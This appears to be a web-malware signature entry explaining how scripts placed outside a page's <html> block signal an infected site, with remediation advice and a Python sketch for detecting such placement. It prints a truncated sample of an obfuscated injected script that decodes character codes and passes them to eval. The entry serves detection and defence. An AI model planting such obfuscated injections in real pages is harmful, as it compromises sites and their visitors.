Malware entry: warning.html_anomaly

Description: We detected an anomaly in HTML code placement. Typical anomalies are scripts and iframes placed outside of the <html>..</html> block, which means that the change was made by someone who is not familiar with the web page generation process of this particular site (massive automated infection) or who simply doesn't have access to the code that generates the web pages (for example, server-level infections that append malware to every server response). This is a strong signal that a stranger tried to modify web pages.

Example

...
</html><script>Object.prototype.tes=-2;var s;aa =document.createTextNode("harC"+"ode");s=String["fr"+"omC"+aa['nod'+'eVa'+"lue"]];for(i in{})if(i=='t'+'es')h={}[i];eval(s(7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,...skipped...57-h,7-h,7-h,123-h));</script>

In rare cases, webmasters with little experience with HTML put scripts outside of the <html>..</html> block. If you see this warning for the scripts that you placed on your site yourself, just move them inside the <html>..</html> block - this should be a really easy fix for someone who controls the site.
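A minimal sketch of the placement check described above, for auditing your own pages. This is an added example, not the scanner's actual implementation; the function name, the regex heuristics and the sample pages are assumptions constructed for illustration.

```python
import re

# Tags the description calls out: scripts and iframes.
TAG_RE = re.compile(r"<\s*(script|iframe)\b", re.IGNORECASE)
HTML_OPEN_RE = re.compile(r"<\s*html\b[^>]*>", re.IGNORECASE)
HTML_CLOSE_RE = re.compile(r"<\s*/\s*html\s*>", re.IGNORECASE)
COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)


def _blank(match):
    # Replace comment text with spaces so reported offsets stay valid.
    return " " * len(match.group(0))


def find_html_anomalies(page):
    """Return (tag, offset, position) for script/iframe tags outside <html>..</html>.

    Regex heuristic, not a full HTML parser: good enough to triage a response
    body, but confirm any hit by reading the page source.
    """
    text = COMMENT_RE.sub(_blank, page)
    opening = HTML_OPEN_RE.search(text)
    if opening is None:
        return []  # fragment or non-HTML response: no block to be outside of
    closings = list(HTML_CLOSE_RE.finditer(text))
    # Use the last </html>: content appended to a response follows it.
    end = closings[-1].end() if closings else len(text)
    findings = []
    for m in TAG_RE.finditer(text):
        if m.start() < opening.start():
            findings.append((m.group(1).lower(), m.start(), "before <html>"))
        elif m.start() >= end:
            findings.append((m.group(1).lower(), m.start(), "after </html>"))
    return findings


# Constructed sample pages (not taken from any real site).
CLEAN = ('<!DOCTYPE html>\n<html><head><script src="/app.js"></script></head>'
         '<body>ok</body></html>\n')
APPENDED = CLEAN + "<script>/* constructed placeholder */</script>"
PREPENDED = '<iframe src="http://example.invalid/"></iframe>' + CLEAN

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("appended", APPENDED), ("prepended", PREPENDED)):
        print(name, find_html_anomalies(page))
```

Run it against the raw response body as served, not the template source, since server-level infections only show up in what the web server actually sends.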



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb